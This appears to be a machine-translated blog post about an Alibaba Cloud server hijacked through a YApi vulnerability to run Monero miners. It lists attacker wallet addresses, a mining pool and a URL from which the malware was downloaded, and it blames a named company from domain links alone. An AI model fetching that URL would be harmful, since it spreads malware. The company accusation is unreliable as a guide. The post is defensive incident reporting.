The server was swiped ？

Recently, Alibaba cloud has always warned about various risks , It's just a simple process , I don't care .

Today, I want to read a of the server Static files , Always fail , Succeed once or twice , Alicloud servers are always connected , Once suspected the problem of the company network , Then I hung up once when I packed it remotely , That means there must be something wrong with the server .

When I came home, I found that Yapi A loophole in the will lead to mining , So I quickly banned Yapi Services related to .

It is suspected that there may be residual files , Then you have to check carefully . First, check the file path in the Alibaba cloud alarm information , Delete the deleted .

1. One case was found ：

According to this address, we can find , This is the cat pool , And get the address of his stolen wallet .

Cat pool address ：https://c3pool.com/cn/

** Unexpectedly 277 Miners for a period of service , And made hundreds of money .**

** 0.0444 = 55 RMB , 0.067/0.00455 + 55 == 976 RMB . near 1 Thousand pieces , Using someone else's server , Transfer your own money . *

The wallet address is ：43sEd48rjD2TpXjv7ptYWq1XWLGfpRKw25w1XtNd7rQDFpxrtcvu6KrNnmiX2Ui3Zb2rqEmdbGcg4gdW1ptApHGjAc6mqww

You can monitor it later , How much can he make .

2. Then follow it down , Discover the second miner program ：

There is no quantity at present .

Found another problem ：

Someone from alicloud server in Shanghai .

3. Found the same record as the first one ：

43sEd48rjD2TpXjv7ptYWq1XWLGfpRKw25w1XtNd7rQDFpxrtcvu6KrNnmiX2Ui3Zb2rqEmdbGcg4gdW1ptApHGjAc6mqww

3.1 A third case was found ：

4. Special cases are found ：

5. Another case was found ：

46n4YeKAjUp2FcJnx8SFEb5CMK3kMRJ9o9MEuCzWtv2VEF5LYeq6TJKSWV3h4sEj4CQiUmsb2dNMEQcKJZJM8zCYFp7wFoy

Found the above malicious program , The file is also saved locally , The process has been deleted .

Further discovery

All domain names are from https://jhx15.zzlxrj.com/Uploads/image/goods/2021-06-07/mysql.tar.gz Download data , Before that , It must be the user operation of the server .

It was you ！！！

Zhengzhou continuous Software Technology Co., Ltd , It looks like a deep dig .

Associated with so many domain names , At first glance, it is not a serious company .

Now that we have found the company , It would be QQ Contact me .

The full mailbox is ：[email protected]

Many new domain names have been registered .

thus , The investigation has been completed . We'll see how to play later .

Another cloud of doubt arises ？

The next morning, I found that Alibaba cloud had another alarm , I traced it to Vietnam , Shanghai ip In heavy use of memory , Reset the system .

Upgrade now YApi The version of the to 1.9.5.

Since you are through YApi Hold my , Then I have to check what you have done ？

These tables can be found through the existing database ：

That's how he attacked me

Feeling adv_mock and adv_mock_case I little interesting , Go in and have a look ：

drink , Dynamically execute scripts , Um. , I little interesting .

This article by the blog one article many sends the platform OpenWrite Release ！